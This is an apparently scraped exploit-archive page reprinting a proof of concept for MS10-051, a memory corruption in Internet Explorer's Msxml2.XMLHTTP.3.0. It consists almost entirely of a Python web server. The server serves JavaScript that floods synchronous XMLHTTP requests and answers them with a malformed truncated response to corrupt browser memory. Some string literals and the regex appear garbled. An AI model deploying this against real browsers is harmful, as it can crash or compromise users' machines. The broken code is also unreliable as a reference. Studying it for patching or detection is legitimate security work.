Home / os / win7

Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10

Posted on 10 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================
Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)
=================================================================

# Sources:
# http://skypher.com/index.php/2010/08/10/ms10-051/
# http://code.google.com/p/skylined/issues/detail?id=17
#
import os, re, socket;
webserver_port = 28876;
 
replies = {
  r'^/$': ('text/html', &quot;&quot;&quot;
&lt;SCRIPT&gt;
  iCounter = 0
  function go() {
    var request_url = location.protocol + &quot;//&quot; + location.host + &quot;/RandomHTTP?counter=&quot; + (iCounter++);
    var xml_http_request = new ActiveXObject(&quot;Msxml2.XMLHTTP.3.0&quot;);
    xml_http_request.open(&quot;GET&quot;, request_url, false);
    xml_http_request.send();
    setTimeout(go, 1);
  }
  go();
&lt;/SCRIPT&gt;
&quot;&quot;&quot;),
  r'^/RandomHTTP?counter=d+$': 'HTTP 4
',
};
 
server_socket = socket.socket();
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);
server_socket.bind(('', webserver_port));
server_socket.listen(1);
print 'Webserver running at http://localhost:%d/' % webserver_port;
 
while 1:
  client_socket,_ = server_socket.accept();
  try:
    request = client_socket.recv(1024);
  except socket.error, e:
    print '&gt;&gt; ??';
    continue;
  print '&gt;&gt; ' + request.split('
')[0];
  path = None;
  if request[:4] == 'GET ':
    end_path = request.find(' ', 4);
    if end_path != -1:
      path = request[4:end_path];
  code, reason, mime_type, body = 404, 'Not found', 'text/plain', 'Not found';
  response = None;
  if path is not None:
    for path_regexp in replies.keys():
      if re.match(path_regexp, path):
        if type(replies[path_regexp]) == str:
          response = replies[path_regexp];
        elif type(replies[path_regexp]) == tuple:
          code, reason = 200, 'OK';
          mime_type, body = replies[path_regexp];
        else:
          code, reason, mime_type, body = replies[path_regexp](path);
        break;
  if response is None:
    response = '
'.join([
      'HTTP/1.1 %03d %s' % (code, reason),
      'Content-Type: %s' % mime_type,
      'Date: Sat Aug 28 1976 09:15:00 GMT',
      'Expires: Sat Aug 28 1976 09:15:00 GMT',
      'Cache-Control: no-cache, must-revalidate',
      'Pragma: no-cache',
      'Accept-Ranges: bytes',
      'Content-Length: %d' % len(body),
      '',
      body
    ]);
  print '&lt;&lt; %s (%d bytes %s)' % 
      (response.split('
')[0], len(response), mime_type);
  try:
    client_socket.send(response);
  except socket.error, e:
    pass;
  client_socket.close();


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP